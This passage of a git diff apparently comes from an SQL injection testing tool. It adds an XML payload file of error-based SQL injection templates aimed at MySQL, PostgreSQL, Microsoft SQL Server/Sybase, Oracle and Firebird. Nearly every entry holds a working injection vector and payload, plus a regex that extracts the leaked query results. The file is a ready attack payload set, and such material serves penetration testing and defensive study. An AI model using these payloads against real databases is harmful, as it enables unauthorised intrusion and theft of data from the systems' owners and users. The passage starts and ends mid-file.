+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+    <!-- End of stacked conditional-error blind queries tests -->
+</root>
diff --git a/xml/payloads/02_error_based.xml b/xml/payloads/02_error_based.xml
new file mode 100644
index 000000000..bf05f189f
--- /dev/null
+++ b/xml/payloads/02_error_based.xml
@@ -0,0 +1,854 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- Error-based tests - WHERE or HAVING clause -->
+    <test>
+        <title>MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
+        <request>
+            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
+        <request>
+            <payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.5</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 4.1 AND error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
+        <request>
+            <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 4.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL AND error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
+        <request>
+            <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND error-based - WHERE or HAVING clause (XMLType)</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+            <dbms_version>&gt;= 8.1.6</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird AND error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0 OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
+        <request>
+            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
+        <request>
+            <payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.5</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
+        <request>
+            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 4.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
+        <request>
+            <payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
+        <request>
+            <payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR error-based - WHERE or HAVING clause (XMLType)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+            <dbms_version>&gt;= 8.1.6</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
+    <!--
+         TODO: if possible, add payload for SQLite, Microsoft Access,
+         and SAP MaxDB - no known techniques at this time
+    -->
+    <!-- End of error-based tests - WHERE or HAVING clause -->
+
+    <!-- Error-based tests - After ORDER BY...LIMIT... -->
+    <test>
+        <title>MySQL &gt;= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>0</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)</vector>
+        <request>
+            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+    <!-- End of error-based tests - After ORDER BY...LIMIT... -->
+
+    <!-- Error-based tests - Parameter replace -->
+    <test>
+        <title>MySQL &gt;= 5.0 error-based - Parameter replace</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
+        <request>
+            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
+        <request>
+            <payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>0</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
+        <request>
+            <payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>0</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.5</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL error-based - Parameter replace</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
+        <request>
+            <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase error-based - Parameter replace</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
+        <request>
+            <payload>(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
+        </request>
+        <response>
